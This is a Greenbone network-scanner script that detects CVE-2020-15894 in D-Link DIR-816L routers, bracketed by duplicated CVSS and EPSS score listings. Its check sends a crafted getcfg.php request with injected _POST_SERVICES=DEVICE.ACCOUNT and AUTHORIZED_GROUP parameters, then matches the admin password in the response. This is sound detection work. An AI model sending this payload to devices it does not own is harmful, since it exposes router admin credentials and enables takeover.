5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
9.4 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
53.6%
The D-Link DIR-816L is prone to an information disclosure
vulnerability.
# SPDX-FileCopyrightText: 2020 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
CPE_PREFIX = "cpe:/o:dlink";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.144342");
script_version("2023-11-21T05:05:52+0000");
script_tag(name:"last_modification", value:"2023-11-21 05:05:52 +0000 (Tue, 21 Nov 2023)");
script_tag(name:"creation_date", value:"2020-08-03 09:07:05 +0000 (Mon, 03 Aug 2020)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2020-07-24 19:13:00 +0000 (Fri, 24 Jul 2020)");
script_cve_id("CVE-2020-15894");
script_tag(name:"qod_type", value:"exploit");
script_tag(name:"solution_type", value:"VendorFix");
script_name("D-Link DIR-816L Information Disclosure Vulnerability (CVE-2020-15894)");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2020 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_dlink_dns_http_detect.nasl", "gb_dlink_dsl_detect.nasl",
"gb_dlink_dap_consolidation.nasl", "gb_dlink_dir_consolidation.nasl",
"gb_dlink_dwr_detect.nasl");
script_mandatory_keys("d-link/http/detected"); # nb: Experiences in the past have shown that various different devices might be affected
script_require_ports("Services/www", 80);
script_tag(name:"summary", value:"The D-Link DIR-816L is prone to an information disclosure
vulnerability.");
script_tag(name:"insight", value:"There exists an exposed administration function in getcfg.php,
which can be used to call various services. It can be utilized by an attacker to retrieve various
sensitive information, such as admin login credentials, by setting the value of _POST_SERVICES in
the query string to DEVICE.ACCOUNT.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"affected", value:"D-Link DIR-816L devices. Other D-Link products might be affected
as well.");
script_tag(name:"solution", value:"See the referenced vendor advisory for a solution.");
script_xref(name:"URL", value:"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169");
script_xref(name:"URL", value:"https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!infos = get_app_port_from_cpe_prefix(cpe: CPE_PREFIX, service: "www"))
exit(0);
port = infos["port"];
CPE = infos["cpe"];
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
url = dir + "/getcfg.php?a=%0A_POST_SERVICES%3DDEVICE.ACCOUNT%0AAUTHORIZED_GROUP%3D1";
if (http_vuln_check(port: port, url: url, pattern: "<password>[^<]+</password>", check_header: TRUE,
extra_check: "<service>DEVICE\.ACCOUNT")) {
report = http_report_vuln_url(port: port, url: url);
security_message(port: port, data: report);
exit(0);
}
exit(99);
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
9.4 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
53.6%